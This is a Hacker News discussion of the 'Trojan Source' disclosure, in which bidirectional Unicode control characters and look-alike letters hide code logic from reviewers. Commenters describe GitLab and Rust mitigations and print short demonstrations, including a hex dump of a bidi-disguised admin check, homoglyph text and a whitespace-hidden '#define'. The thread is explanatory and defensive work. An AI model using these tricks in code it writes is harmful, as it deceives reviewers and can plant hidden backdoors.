Hacker News new | past | comments | ask | show | jobs | submit login
‘Trojan Source’ Bug Threatens the Security of All Code (krebsonsecurity.com)
494 points by picture 82 days ago | hide | past | favorite | 271 comments

This was a pretty interesting thing to mitigate - we added some support around it to GitLab after it was reported to us, which shipped in the latest security release: https://gitlab.com/gitlab-org/gitlab/-/commit/3fb44197195b57... (you can actually see it in effect on that commit's examples, which is quite meta). These characters have valid use-cases in right-to-left languages like Arabic, Japanese etc, so it had to be configurable for project-owners if they have legitimate use-cases for it. Our focus was on making sure that repository maintainers could see these characters in code reviews.

The homoglyph attack is interesting but it really should be noticed as part of a code review process, as it requires adding the imitation function calls at some point too. It'd also likely be pretty frustrating to end users if we were to highlight every single unicode character that looks like the latin alphabet.

It's certainly a good lesson in not copy/pasting random snippets from the internet and pasting them into a root shell, however :D (we do always highlight the bidi characters on GitLab snippets, though)

Aside: this was a royal pain in the arse to figure out if I had live examples in the specs, because vim also just rendered them "correctly". I ended up checking the files in Windows Notepad on another machine to sanity check them.

Thanks to the authors for responsible disclosure.

> It'd also likely be pretty frustrating to end users if we were to highlight every single unicode character that looks like the latin alphabet.

That actually strikes me as very desirable. (Especially in light of the old maxim that "programs must be written for people to read, and only incidentally for machines to execute".)

Those Unicode characters aren't just there for show. They're part of real scripts that real people use; it would be annoying for people using those scripts.

I'm fairly sure this could be arranged for. As in, if there's too many of them belonging to the character set of a particular language, then it's very likely that it's simply a text in that language. But random characters in the middle of ASCII identifiers are probably not something that you want.

Yeah I'm not opposed to adding highlighting to them, and we are investigating how to do it, but it was less clear-cut than the bidi characters (which are totally invisible when rendered). I think we'll want to make it a bit more configurable and probably a separate option to the one which highlights the bidi characters.

Exactly. When we were adding support for non-ASCII identifiers to Rust, and thinking about homoglyphs and confusable characters, we needed to evaluate the tradeoffs between catching such characters and inconveniencing the speakers of various languages who want to write Rust in their language.

This type of attack isn't new. I can't recall the names but there are afair multiple C/C++ coding standards that limit everything to ASCII to avoid precisely this attack, but also others with visually similar but nonequivalent names.

Yes, and they should be in well annotated/marked string/data sections, not in logic code.

Latin C and Cyrillic С aren't the same letter. The latter is actually an "s". It would be a pain in the ass to work with strings if those Cyrillic letters that look like their Latin counterparts reused their codepoints. Imagine having to convert "M" to lowercase. Would that return "m" or "м"? Same for "H", "h" or "н"?

And, actually, there was some really really cursed Soviet encoding that did this to save bits. The Russian railway company still uses it[1] to this day.

[1] https://habr.com/ru/post/547820/

> there was some really really cursed Soviet encoding

I know at least 10 stories that start like this

> Latin C and Cyrillic С aren't the same letter.

Well, as a moderately old Czech, I'm somewhat familiar with Cyrillic. They kind of used to force it on us in schools.

  this was a royal pain in the arse to figure out if I had live examples in the specs, because vim also just rendered them "correctly"
That's because vim supports Farsi/Arabic natively from day one. Even if the OS does not support it, you can still write bidirectional and right-to-left text in vim. Never knew the reason, but thanks Bram Molenaar.

I was impatient to find the example you were talking about; as far as I can tell, this is the line with the example: https://gitlab.com/gitlab-org/gitlab/-/commit/3fb44197195b57...

And here's what it looks like in various conditions/viewers:

With the fix, this is how it looks in the browser in the Gitlab interface:

    if (accessLevel != "user�") {� // Check if admin ��
Without the fix, viewed raw (and thus viewed in a vulnerable way), it looks like this:

    if (accessLevel != "user") { // Check if admin
And in a hex viewer, it looks like this:

    000005b0: 2020 2020 2020 2069 6620 2861 6363 6573         if (acces
    000005c0: 734c 6576 656c 2021 3d20 2275 7365 72e2  sLevel != "user.
    000005d0: 80ae 20e2 81a6 2f2f 2043 6865 636b 2069  .. ...// Check i
    000005e0: 6620 6164 6d69 6ee2 81a9 20e2 81a6 2229  f admin... ...")
    000005f0: 207b 0a20 2020 2020 2020 2020 2020 2020   {.
    00000600: 2063 6f6e 736f 6c65 2e6c 6f67 2822 596f   console.log("Yo
    00000610: 7520 6172 6520 616e 2061 646d 696e 2e22  u are an admin."

That's a great example ^ that demonstrates exactly how this vulnerability can be easily abused

I was intrigued by your meta example and I took a look. It took me 3-4 minutes to find the warning, and I was looking for it!

I was expecting a big fat warning on the merge request itself, or maybe on the lines containing the dangerous chars.

In the end, it is a small ? character inserted were the unicode control chars are, and a mouseover tooltip warning about a potential issue.

The warning is good, but why so subtle? Sorry for the criticism. The feature is still a huge positive.

Thanks for the feedback! Our primary use-case when deciding on it was to flag these up in a code-review situation, to prevent malicious content being submitted in merge requests to unsuspecting projects. We found this made it stand out enough to the reviewer when performing code reviews. I also try to not be too quick to add new alerts or sections to the GUI as we sometimes get criticised for having too much clutter D:

GitHub by comparison went down the alert banner route, from what I can see. I'm not opposed to adding something to that effect as well though - especially for inexperienced reviewers, it would be nice to include some more information about the potential exploit. That could be something we revisit when we add the homoglyph highlighting.

Thus, one sloppy review by that known tired-in-the-mornings dev, "sure thing, looks like Java..", and your little marking is missed?

I personally wish that in repos with the warning enabled, that the �s were displayed in lieu of the malicious characters instead of in addition to them. For example, I'd rather see this:

          var accessLevel = "user";
          if (accessLevel != "user� �// Check if admin� �") {
              console.log("You are an admin.");
than this:

          var accessLevel = "user";
          if (accessLevel != "user�") {� // Check if admin�� 
              console.log("You are an admin.");

Is that possible to do using CSS with our existing markup? Currently we prepend the � using ::before. I imagine we could probably hide the existing character and shuffle the � over where it should be, but it might need some testing across different text sizes I imagine. I'll make a note of it for our next revision :)

I don't think what I want is possible with a pure-CSS solution, but I'm not 100% sure.

> It'd also likely be pretty frustrating to end users if we were to highlight every single unicode character that looks like the latin alphabet.

Have you tried something similar to what the browsers do where highlighting is only enabled when there are multiple scripts mixed within the same token? Source code seems like it would be harder since you have many tokens rather than just a single one as in a hostname, and I'd be curious how much legitimate usage mixes scripts for technical reasons because you have something like a language or framework convention that certain names start with a particular English-derived term.

So far we're just detecting individual bidi characters, but looking at characters in their greater context could be quite interesting. This would seem like quite a good use-case for machine-learning too, if you wanted to get super into it.

> It's certainly a good lesson in not copy/pasting random snippets from the internet and pasting them into a root shell, however

I gotta say that I always make sure that I understand each piece of code that I copy paste but I do copy paste and never thought of this type of attack. Maybe that's something I should pay attention to in the future.

from the article, its likely you'd not even notice - unless you pasted in an ascii only editor that doesn't allow anything other than plain old text.

> It's certainly a good lesson in not copy/pasting random snippets from the internet...

For someone with more gumption than me:

Future copy & paste will default have intermediate screenshot and OCR steps. Voila: charset scrubbing for free.

Why not? Already today misc UIs and renderings disallow text selection. Drives me nuts.

The future is now. Android has been doing this for years and it's awesome. There's no text you can't copy.

To clarify, by default copy and paste works the normal way, but you can open the app switcher to use the OCR copy/paste which works on non-selectable text too, even in images.

There's a way to prevent this - to my great annoyance, health apps (such as the ubiquitous MyHealth variants) and banking apps can prevent you from taking screenshots or copying text. This is presumably to prevent screen-scraping apps from stealing your private data, but it's really annoying when you're trying to screenshot a QR code for some kind of check-in process.

That's why you need a second phone to photograph the screen of the first phone.

If you root your phone, you can use an Xposed module like DisableFlagSecure to get around apps that do that.

This is too complicated for a personal supercomputer to be burdened with. Better to ship everything on the clipboard to a sanitizer service.

>These characters have valid use-cases in right-to-left languages like Arabic, Japanese etc,

I've never seen it used for Japanese. I don't think there is a valid use case for Japanese.

Ah yes you're right - looks like that can be handled with CSS: https://www.w3.org/International/articles/vertical-text/. Although from what I've seen most Japanese websites tend to be left-to-right instead anyway.

Hebrew would be a more valid second example I think. I'd be curious to know how many languages maintain their RTL preference online.

Japanese¹ isn't a right to left language, exactly. It can be written horizontally, in which case it's L-R, top to bottom, or, vertically, in which case it's top to bottom, with columns running R-L, but functionally, this is still like L-R typesetting, just with the characters rotated 90° CCW and the pages are then read in the same order as pages in a R-L book. This is typical of manga which is why there might have been confusion by the OP about the directionality of Japanese.


1. All of this also applies to Chinese and Korean. Interestingly, traditional Mongolian script is also written vertically, but in columns left to right rather than right to left.

This doesn't feel particularly new either? Isn't it pretty much a new variant of https://github.com/reinderien/mimic ?

Which, if one is suspicious of code, can be defeated in vim with: set encoding=latin1

Which breaks other things, such as every other string that's not written in English. But it's a great tip for a quick check, thanks! (Much more convenient than piping text through xxd)

Yeah, it's definitely just for quick checks if the text is in fact using unicode. But, hopefully just for stuff you're suspicious of where you could mandate no-unicode.

As I previously noted on a related post:

Interesting paper. Note, however, that the general problem is already known and there are a number of pre-existing works that discuss it. This is typically called "underhanded code" or sometimes "maliciously misleading code". I'm surprised that they didn't use the normal term for the problem nor cite the previous work on it - maybe they didn't realize this was a widely-known problem? Previous works on underhanded code didn't discuss Bidi to my knowledge (though other attacks on text like this have exploited Bidi). Here are a number of other materials about underhanded code:

The Obfuscated V Contest (http://graphics.stanford.edu/~danielh/vote/vote.html) was created by Daniel Horn in 2004 and is the earliest “underhanded” programming contest that I found. It was a contest to create source code that looked like it did one thing, but actually did another.

Underhanded C Contest (http://www.underhanded-c.org/) has run in many years. Per its FAQ, "The Underhanded C Contest is an annual contest to write innocent-looking C code implementing malicious behavior."

My PhD dissertation "Fully Countering Trusting Trust through Diverse Double-Compiling" discusses how to counter the "trusting trust" problem & includes a section about maliciously misleading source code. See: https://dwheeler.com/trusting-trust/

The JavaScript Misdirection Contest announced the winner on September 27, 2015 http://misdirect.ion.land/

My paper "Initial Analysis of Underhanded Source Code", (by David A. Wheeler, April, 2020, IDA document: D-13166), discusses underhanded code and the effectiveness of several potential countermeasures. It also includes a number of citations to other works on underhanded code. https://www.ida.org/research-and-publications/publications/a...

First place winner of last year's underhanded Solidity contest used exactly this trick: https://blog.soliditylang.org/2020/12/03/solidity-underhande...

There was related issue in 2018 regarding line endings, which would allow disguised some lines as code, but keeping them as comments: https://docs.google.com/document/d/1PZBSCBWBwd6AqWCgXqLnw8FN...

Both of these were fixed in Solidity shortly after the bug reports.

(P.S. I'm a member of the Solidity team)

This is a great treasure trove of deep Solidity trivia. Thanks for the link!

It's also worth noting that if you're caught playing games like this, there is really no way to explain your actions that would avoid serious consequences.

If however, you used the "bugdoor" method, you can plausibly deny any malicious intent and you will absolutely get away with it.

Oldest trick in the book:

    /* Legitimate comment.        <a lot of white space to go off screen> */ #define malicious code
Nobody will notice the horizontal scroll bar.

Except your IDE and CI should rightfully complain about lines of 160+ characters. That's one of the real reasons for this rule, not just "fits on the screen nicely".

That often fails. E.g., Vim has line wrap on by default so you would still see the text.

> Cambridge research clearly shows that most compilers can be tricked with Unicode into processing code in a different way than a reader would expect it to be processed.

Unless I misunderstand the premise, this in not right. The compiler is not "tricked" into doing anything different - it interprets the code the same way as it always did. It's like saying "rm" command "can be tricked into" deleting important files. The rm tool doesn't know which files are important to you, and the compiler doesn't - and shouldn't - know what you consider to be "correct" code. It would correctly compile any code that is syntactically correct - if there are strings inside that look weird to you, it doesn't matter to the compiler.

The entity that can be "tricked" here is the reviewer of the code - who, indeed, might probably be tricked into accepting code that does something different than they'd think it does (though it'd require a very clever attacker to for the code to both do something nefarious with Unicode and still look innocent and not weird to the reviewer). Fortunately, this is quite easy to fix - just don't accept any patches with source code that have any non-ASCII outside small set of localization resources (proper code would have localizable resources outside the code anyway, tbh) and no Unicode would ever trick you.

> Fortunately, this is quite easy to fix - just don't accept any patches with source code that have any non-ASCII outside small set of localization resources

There are plenty of projects out there written by people who aren't English speakers who depend on the Unicode capabilities of languages to write code that is actually readable to them. Turning that off is far from a solution.

Does anyone actually do that in a production code?

I myself am not native English speaker and use unicode when writing in my mother tongue, but in 20+ years of programming I've never seen anyone using non-ascii chars in their professionally written code? Of course, you use the language in localization files, and perhaps in comments occasionally - especially in TODO stuff that's not meant to be permanent - but not in the actual code, like e.g. for a variable or function names.

I'd actually consider it a bad idea, as it limits significantly who can manage that code in the future.

It's a very western / Anglosphere attitude, and I think you underestimate how much code is produced in e.g. China and Japan nowadays, with comments in their native language.

How would you name a FooBarWicket if you don't speak a word of English?

I mean don't get me wrong, ideally everybody writes code in perfect English and sticks to a set of ~50 ascii characters, but it's not an ideal world and you have to keep other languages and cultures in mind.

I would argue that even if you decide that you are using some other language and not English, there is only a well-defined subset of Unicode characters that should ever be allowed in the codebase. Bidi override control characters are clearly not among them, whichever language you choose.

> Bidi override control characters are clearly not among them, whichever language you choose.

Not sure how would you write a comment in an RTL human language in the middle of LTR code without it. Lots of people write learn RTL languages well before writing any code.

What compilers can do is to process those characters and assign them semantic value that makes the code equivalent to what is expected to be rendered.

Now, bidi overrides in identifier names is a nightmare I’d prefer to avoid.

You do not actually need the bidi override control character to put a comment in an RTL language in the middle of LTR code.

You only need it if you are doing this, and the default Unicode algorithm for guessing LTR/RTL boundaries gets it wrong, so you need to override with an explicit bidi override control. I'm not even sure how feasible that is to do in current editor/IDE environments developers who have this use case might use.

I am genuinely curious how often these sorts of situations come up in actual development.

> What compilers can do is to process those characters and assign them semantic value that makes the code equivalent to what is expected to be rendered.

I don't understand what you mean or how that's even possible, for the kinds of attacks discussed in OP.

Btw here's proof. Here is ltr text and rtl עִברִית text عربي interspersed with no bidi override control characters to be found.

Unicode can handle this, it has a heuristic algorithm for it. Note how if you try to select the text character-by-character, your selection does funny things at the rtl to ltr boundaries, because the byte order doesn't match the order on the screen. It really is handling the directionality changes, with the letters entered in "order" across changes, there is no funny entry or ordering going on, this is plain old normal unicode handling interspersed directionality changes just fine, with no bidi overrides.

It just sometimes gets it wrong for the intent of the author. Especially when there are characters at the boundaries that are themselves not strongly associated as rtl or ltr (like ordinary "western arabic numerals" or punctuation). That's what the bidi override control char is for.

The same way as you write a comment in a LTR human language in the middle of RTL code - you don't. You stick to either LTR or RTL. This is code, not prose.

Code is meant to be read and, occasionally, executed. Comments are usually ignored by compilers and are targeted towards humans.

> Not sure how would you write a comment in an RTL human language

Siht ekil.

> there is only a well-defined subset of Unicode characters that should ever be allowed in the codebase

It's not even remotely well-defined, and probably never will be. Also, as long as we keep adding to unicode, you will need to keep your whitelist of code points updated.

You can however find a well-defined subset of characters that can be allowed.

In either case you'd be essentially excluding entire languages.

You misunderstood my point:

>> There is only ... that should ever be allowed...

What I am saying is someone decides to code in a non-english language (which is completely reasonable) they should define a subset of unicode characters that is acceptable. Additionally, the allowed characters should not permit tricks like these.

As for excluding entire languages... well, yes. This is already the case today. But OTOH it's not like understanding what "if" means gives you any special advantage in programming.

Well, what you call an Anglosphere attitude is a reality of learning in a majority of non-english speaking countries: There's simply not enough resources for learning in your own language.

China is huge so I can see how it could work for them, but I still have to admit it's very hard for me to imagine someone becoming say a competent web dev without picking at least some basic English along the way, so they can handle at least the documentation and stay in a loop on new tech coming out all the time. It's not anything new as a concept, nor I see it as damaging for local cultures in any way - back in my University days I've learned myself some Russian so that I could read their physics and chemistry books which were excellent and way cheaper and easier for me to get than those from the West. One day I'll have no problem learning some Chinese if (or more likely when?) they become the referent source of knowledge.

> China is huge so I can see how it could work for them, but I still have to admit it's very hard for me to imagine someone becoming say a competent web dev without picking at least some basic English along the way,

Having worked with some large software teams in China my experience was that most people could speak a bit of English (but generally didn't want to) and were nowhere near at the level needed to actually design and write software in English.

If we forced them to do everything in English quality was terrible and everything took ages, but it we let them write in Mandarin things were much better.

> it's very hard for me to imagine someone becoming say a competent web dev without picking at least some basic English along the way, so they can handle at least the documentation and stay in a loop on new tech coming out all the time.

Why would they need to learn English to do those things? I'm sure there are Chinese-language tech news sites, and Chinese-language documentation.

When you code for yourself, write what you want. If you write to collaborate then use English/ASCII. Imagine international aviation if they allowed the same BS that people in IT allow and now even try to promote - everyone talking their own language and not understanding each other - we would have planes colliding and crashing all over the place.

We used to have that, with exactly the result you describe. Which is why it was changed.

We’ll get there eventually with software, but it generally doesn’t kill people so there’s less incentive.

Aviation requires real-time communication; it's not a great analogy, I don't think.

Agreed, but I'm still curious (and don't know the answer) how often someone actually needs to put a "Bidi override" in a comment... if I were a language designer I'd be tempted to just say they aren't allowed in comments or identifiers or anywhere but string literals/data, and have the compiler/interpreter just reject it.

(I have used a bidi override before myself, for non-malicious purposes!)

> anywhere but string literals/data

The examples [0] posted in this thread have the bidi characters inside a string literal.

[0] https://gitlab.com/gitlab-org/gitlab/-/commit/3fb44197195b57...

I'm not sure what they are being posted as examples of there? Can a bidi char in a string literal be succesfully used in the sort of attack in the OP, a "Trojan Source" attack?

If so, that is devious!

It's not clear to me if those example show that though. They show bidi characters being highlighted in a string literal, right.

My hypothesis was that such could not be part of a "trojan source" attack... but this stuff is confusing and I could have it wrong?

> How would you name a FooBarWicket if you don't speak a word of English?

How would you learn how to make a FooBarWicket without knowing a word of English? Any programming languages control constructs are almost by definition English.

I still wonder though, just how much production non-comment source code is not written in the ASCII character set.

The libraries of most programming languages (developed in the west) are in ASCII - frameworks and middleware too. Have people in countries like Japan and China actually translated all of that code - renaming functions, classes, and variable names to their native tongue in Unicode - or do they just learn the English names (they are all nouns/pronouns and at most simple phrases so translation should not be too difficult; they don’t have to understand English grammar).

Microsoft translated all the commands in the scripting language for excell to native language, making it totally impossible to use for anyone. You can't even google it because the help is so split up in different languages.

Not only the commands, the separator too. In some languages, it's FUNCTION(arg1, arg2), in some others it's FONCTION(arg1; arg2)

Ah yes, Swedish was one of those languages I think. I can't imagine a worse thing to do with a programming language...

> Does anyone actually do that in a production code?

Would you accept teaching code as production code? Specifically, if you were to teach programming to young non English speakers, wouldn't you accept them to use words of their native tongue for variables and such?

> I'd actually consider it a bad idea, as it limits significantly who can manage that code in the future.

Wouldn't you say that solely using roman letters in code would impose a similar limit? In countries where these letters are seldom used (like for instance greek letters in western countries), only those accustomed to them would be able to handle code (as it has been the case until the last decade perhaps).

I can attest that it happens, even in (natural) languages that use Latin scripts. Sure, "just use en.US-ASCII" is a mitigation, and most (Euroamerican) code follows this; the bug extends to string literals however ("they don't end where you see them // this is actually not part of the string; return;"), so a different approach is needed.

Professionally made GUI software needs Unicode even when English localized, for typography.

Proper quotes, proper dashes (ASCII doesn't have a dash character, it only has minus), non-breakable space, soft hyphen, € character, Greek letters like π and μ, etc.

Most of these should be in a separate file for i18n, not directly in the source code.

Internationalization is not limited to putting strings into a table in resource. It also needs non-trivial amount of code. Printing numbers into strings is code not data. Yet if you want the numbers to look good, like "600 μm" or "6×10⁻⁴ meters", you gonna have Unicode in code, not the resources.

Another thing, not every software needs i18n. Depends on the market. I'm yet to see a C++ compiler which would localize their output messages.

“Meters” is an English word, and a string like “600 μm” should still probably be extracted from the code as “%d μm.”

Still, there’re also string like “6·10⁻⁴”

GCC supports localization, that's one C++ compiler.

Intel C++ compiler seems to have a Japanese version (not tried).

I've definitely seen it done, in both code I was adjacent to and code I was pulling from outside. I have vivid memories of stumbling on a lib doing seemingly what I needed but with all comments in Chinese and variables/funcs in Pinyin.

Can you give an example? I've never seen a project (outside domains on APL, etc.) that seriously relied on any Unicode capabilities in the code itself (again, I am not talking about localized strings). My native language is not English, I've worked with people all over Europe, China, India, Japan, Israel, etc. - there are a lot of exciting i18n/l10n problems but I have never seen much of what a compiler would need to be concerned with.

> The rm tool doesn't know which files are important to you, and the compiler doesn't - and shouldn't - know what you consider to be "correct" code.

This is actually no longer true. Many rm implementations today prevent you from deleting a path including the root directory, unless you explicitly specify `--no-preserve-root`. Similarly, a lot of compilers tend to warn you or outright stop if they detect code that is very likely to be buggy - the rust compiler warning about these control characters is just the latest example.

Of course, in theory, each tool should do its job and the user should be the boundary to know whats right. In practice, though, these heuristics tend to catch bugs-to-be 95% of the time (at least in my experience) and are easily disabled otherwise, so they are good to have.

I couldn't care less about my root directory. The only things I care about are the motherboard firmware and the /home directory, and nothing prevents `rm` from deleting those.

The `--one-file-system` or `--preserve-root=all` flags are more useful than `--preserve-root`, but they're not defaults. (For a good reason: compatibility.)

You argument away your own fix. Proposed fix is like if rm was limited to files outside of /sys, plenty of projects depend on the standardized behavior.

APL developers would disagree.

For people that spend their days reviewing APL code, the concerns of mere mortals are not important.

Security advisory for the Rust programming language (with a nice explanation): https://blog.rust-lang.org/2021/11/01/cve-2021-42574.html

Rust 1.56.1 will be released later today.

> To assess the security of the ecosystem we analyzed all crate versions ever published on crates.io (as of 2021-10-17), and only 5 crates have the affected codepoints in their source code, with none of the occurrences being malicious.

Preview of the new helpful error: https://i.imgur.com/pGpZOnr.png

Their advisory is well-written and explains the problem well. The example code they use:

  if access_level != "user" { // Check if admin
opens up a whole can of worms though. You don't need cunning invisible control codes to break that line, you could just replace any of the letters in 'user' with a different, but almost-identical looking unicode symbol and you'd still have an exploit. Even better, this would be a completely deniable attack ("oops, I must have accidentally pressed alt-R while typing that letter" excuse) - whereas explaining away why you checked in some magical RTL/LTR encodings and hacked up a comment is impossible. Plus, it would render well in far more apps, terminals, command line programs, etc etc

> you could just replace any of the letters in 'user' with a different, but almost-identical looking unicode symbol and you'd still have an exploit.

The post mentions that exploit (and Rust's already existing defense) in the appendix.

Here are the details, as explained in a previous post:

> The compiler will warn about potentially confusing situations involving different scripts. For example, using identifiers that look very similar will result in a warning.

    warning: identifier pair considered confusable between `s` and `s`

> warning: identifier pair considered confusable

Note that the lint you mention is about identifiers, while "user" is a literal. The lint does not fire for literals. String literals have always supported non ascii characters since 1.0.0, and there has never been a lint for them, until now with the 1.56.1 release.

Also worth noting that the homoglyph attack isn't linted for in literals or comments, only the bidi codepoints are.

The compiler will warn about potentially confusing situations involving different scripts. For example, using identifiers that look very similar will result in a warning.

Unfortunately, I've little experience of rust, so I don't have experience of that warning. It would certainly help catch a one-liner exploit, but wouldn't it be excessively noisy for code written in non-english languages?

It only warns if there actually are two identifiers that look similar. Even if it's not malicious it's still confusing and is worth renaming.

But if you want to, turning off specific warnings for a file or block of code is really simple in rust, just add "#[allow(confusable_idents)]"

The Unicode homoglyph lint will only trigger if there are multiple identifiers that can look the same, it's not a blanket warning on anything that isn't ASCII. It's close to what browsers do with domain names. And you can always allow lints.

Am I missing something here? The spacing around these homoglyph is almost always noticeably wider than it should be such that I don't understand how you could ever miss it in any half-decent code review.

      if access_level != "user" { // Check if admin

      if access_level != "user" { // Check if admin
Come on, that looks obviously off.

If you were really reviewing that code, Rust has algebraic data types, and access level should be an Enum, not a String.

But it's their example. The problem isn't with homoglyphs, though. It's with bidi control characters, which are invisible to a human but not to the compiler, which is how generated code can end up semantically different from source code, which is the actual problem here. What you see in code review would be the first line, even though that isn't actually what is in the source, because an editor that is bidi-aware would show it that way.

> But it's their example

It's the example that the researchers provided to us, to be clear about it.

> It's with bidi control characters

Sure.. in the original HN submission. I was referring to Rust's built-in homoglyph detection though, which is what the parent comment (and its parent) was about.

I thіnk thаt іt іs possіblе thаt you аre missing а fаіrly important point.

... And that point is that none of the vowels in my previous sentence are latin, I guess.

I think you missed some. I can't seem to paste your fake "i"s back in, but here's what I see:

  $ xxd
  I thіnk thаt іt іs possіblе thаt you аre missing а fаіrly important point.
  00000000: 4920 7468 d196 6e6b 2074 68d0 b074 20d1  I th..nk th..t .
  00000010: 9674 20d1 9673 2070 6f73 73d1 9662 6cd0  .t ..s poss..bl.
  00000020: b520 7468 d0b0 7420 796f 7520 d0b0 7265  . th..t you ..re
  00000030: 206d 6973 7369 6e67 20d0 b020 66d0 b0d1   missing .. f...
  00000040: 9672 6c79 2069 6d70 6f72 7461 6e74 2070  .rly important p
  00000050: 6f69 6e74 2e0a                           oint..

Made you look. :)

I also skipped a bunch of the "I"s.

Yes. What browser did you use to make the comment? I can't get all those characters to paste in.

Firefox 93.0 on Windows 11. Characters copied & pasted from charmap.exe

a: U+0430 "Cyrillic small letter a"

e: U+0435 "Cyrillic small letter e"

i: U+0456 "Cyrillic small letter Byelorussian-Ukranian i"

Ooh, or you could just put in the cyrillic 'а' and even have it look like it's legit :)

This stuff has always been there consider this code:

if (uid = NULL) { // Check if root

And if you’re using clang: if ((uid = NULL)) { // Check if root

I'd venture that this is far more dangerous than unicode in strings...

or how about:


or #include anything with a #DEFINE

> if (uid = NULL) { // Check if root

That's not the same class of error, since here a programmer can see the issue by simple inspection.

> or #include anything with a #DEFINE

This one perhaps is closer to the mark, although not based on unicode.

To me it's the same class of error which is convincing humans and other automated tests that your code is OK when it isn't.

I dealt with a bug that only appeared in release builds, and never in debug. The offending code looked roughly like this:

  if (blah)
    #ifdef DEBUG
The systemic problem was it was a project created by interns, and they'd review each others code. By the time the bug got to me the interns had left and a Sr Dev had spent a day looking for the bug. It took me an hour to find it. In isolation its easy to see but in the mess of all the other code, you really have to look for these things.

Well, if you generalize the statement enough, indeed it's the same class of issue.

In the situation you described:

* you have a fairly easy way to detect the problem

* the interns still have plausible deniability as to whether they intended to leave a defect or not

The discussed problem with unicode is clearly meant to be used as an exploit, its likelihood of occurring by accident seems very close to zero.

Rust doesn't allow assignment in conditionals.


It does, in fact the article you posted, shows you exactly when rust allows assignment in conditionals.

As long as you're initializing a variable, it's allowed, if you're not initializing you'll have to use a block expression.

Should have just used this sentence - which also directly covers parent's case.

"Rust does not allow assignment within simple expressions so they will fail to compile. This is done to prevent subtle errors with = being used instead of ==."


Those are all detectable by a programmer's eyes. Unicode attacks are not.

That’s a really impressively written error message.

That's one of Rust's selling points. For all I've used the rust compiler, not once have I ever not known what error it was pointing out: its error messages are incredibly helpful. Occasionally I am unsure why it's an error, but I always know what it's referring to and what I could do to fix it.

I've had the same experience with C#. The error messages always state exactly what's wrong and where in the code it's wrong. Many of them (especially compiler _warnings_ intended to point out syntax that is almost certainly a bug) also tell you how to fix it (e.g. “consider using ‘new’ keyword if hiding was intended”).

Personally, I don't know why the last one (“consider using ‘new’ keyword if hiding was intended”) isn't an error by default in C# . Not overriding the base method is almost always a mistake, and if it's not a mistake, better to be explicit about it, anyways. My $.02...

It is wrong to call this a bug, this is a feature of Unicode and very intentional. Whether we should have thought about that when allowing parsers to digest anything outside of ASCII is the real question. The answer is probably "IDEs and compilers should ignore character-direction codes when looking at source files." But that doesn't solve homoglyph attacks (and other undiscovered deception). What a fun can of worms. Who gets to solve it?

What's needed is to impose on programming languages, outside of comments, checks similar to the checks made for domain names.

There is a draft standard for this.[1] It references RFC 5893 and some other documents. Some of the rules:

- All code points in a single label must be taken from the same script as determined by the Unicode Standard Annex #24: Script Names. Exceptions to this guideline are permissible for languages with established orthographies and conventions that require the commingled use of multiple scripts. (Like mixing kanji and romaji in Japanese.)

- The "Bidi rules" of RFC 5893, which define allowed right to left and left to right modes, must be enforced. These are complicated, because of such things as the Arabic and Hebrew convention of right to left text with left to right numeric digits in numbers. But they are well-defined.

- Only code points allowed by IDNA 2008 are allowed. This eliminates such things as the non-breaking zero width space, the expansion areas for future use, and such.

The domain name people have been banging on this problem since 2003, and by now, there's a rough consensus of what to disallow. So start putting checks for that in compilers. If you find violations of those rules, it's more likely to be a typo than something useful, anyway.

So that's a way out of this.

[1] https://www.icann.org/en/system/files/files/draft-idn-guidel...

> What's needed is to impose on programming languages, outside of comments, checks similar to the checks made for domain names.

But this attack works by placing characters inside comments and srings. So these checks would not help preventing this particular attack.

They say that, but don't really justify that claim. That's more about string literals that do something other than just display, such as URLs.

You're right - their headline is written for attention. It's an exploit of a feature.

What I'm interested to know is whether there is any code already out there in the wild with this exploit in it? An intelligence service could have exploited this years ago without anyone noticing until now.

Unicode is a pathway to all manner of hijinks, including as you say, homoglyph attacks. For instance, on some TLDs I can easily create two different domain names that render identically in the browser.

> What I'm interested to know is whether there is any code already out there in the wild with this exploit in it?

It's possible, but I doubt it. The paper mentions that Vim isn't vulnerable to the bidirectional attack. Not mentioned in the paper: neither is `less`, the pager, which is used by default for `git diff` and other Git commands. Nor are either of the first two terminals I tried, when `cat`ing the file without a pager.

All of the aforementioned programs display the direction markers as either escape sequences highlighted in bright colors, or garbage characters, both of which stand out visually like a sore thumb. Now, that's more a sign of poor Unicode support in those programs than it is anything to their credit. But it does mean that this kind of attack is incredibly brittle, at least in any codebase where some people working on it are likely to be using Unix tools. There's a high chance the aberrant characters will be spotted at some point or other.

And once spotted, it's self-evident that it's an attack. I suspect real attacks would try to be more subtle, introducing bugs that could pass as genuine mistakes, at least at first glance.

It's sad that largescale exploitation of this is stopped only because many applications still have really poor Unicode support and would therefore make the changes human-visible.

Coding editors also often show this kind of thing intentionally, as those characters are meaningful for interpretation purposes. Many of them are very UTF friendly, but they still show zero-width spaces as e.g. "<zwsp>" on purpose.

They've also often shown non-printable ASCII control characters for basically forever. Null bytes and \bel and whatnot are very important despite being "invisible", and they've been around for decades.

I've been bitten by things like this from an entirely unexpected angle - messengers like teams and skype sometimes <helpfully> replace characters like "-" and " " with all manner of more readable unicode characters. More readable, until the YAML parser choked.

Since that, I pretty much always run some variant of the gremlins plugin, which highlights pretty much all unicode spaces, dashes and other weird control symbols.

Chat apps replacing ™ with a horrifically large, poorly-rendered and off-colored "TM" and ruining The Joke™ is a major pet peeve of mine, yeah :| And even worse, it seems to be spreading, as each one blindly copies the horrible decisions of the others. I would disable all of those auto-replacements everywhere if only I could disable all of those auto-replacements everywhere.

I think making these chars human visible is a feature. Most code editors have features like showing invisible characters, displaying some representation of white space characters, or highlighting control sequences.

Because the editor is supposed to edit plain text, which means all characters must be editable. And something can only be editable if they are visible.

> Now, that's more a sign of poor Unicode support in those programs than it is anything to their credit.

But that behavior is intentional. If you want, you could do "alias less='less -r'", and then it would behave the way you want, and you'd become vulnerable to this attack.

-r makes it pass all control characters to the terminal. To quote less's man page:

> Warning: when the -r option is used, less cannot keep track of the actual appearance of the screen (since this depends on how the screen responds to each type of control character).

This is not the same as actually supporting (i.e. being able to keep track of the screen state for) bidirectional text that may legitimately use those characters.

For that matter, the terminal may not support it either, as I mentioned.

Though, today I learned there has been some effort in recent years to improve bidirectional text handling in terminals and terminal applications, generally:


> I can easily create two different domain names that render identically in the browser

You can't (any more)¹. That worked for a limited amount of time, then mitigations were put in place, and subsequently standardised as part of Unicode. Everyone who deals with implementations of Unicode is supposed to be knowledgeable about the security relevant aspects, you can bet that the people working on browsers definitely are. <http://p3rl.org/perlre#Script-Runs>

¹ invitation to prove me wrong, I am on purpose leaning far out the metaphoric window and will gladly eat my words

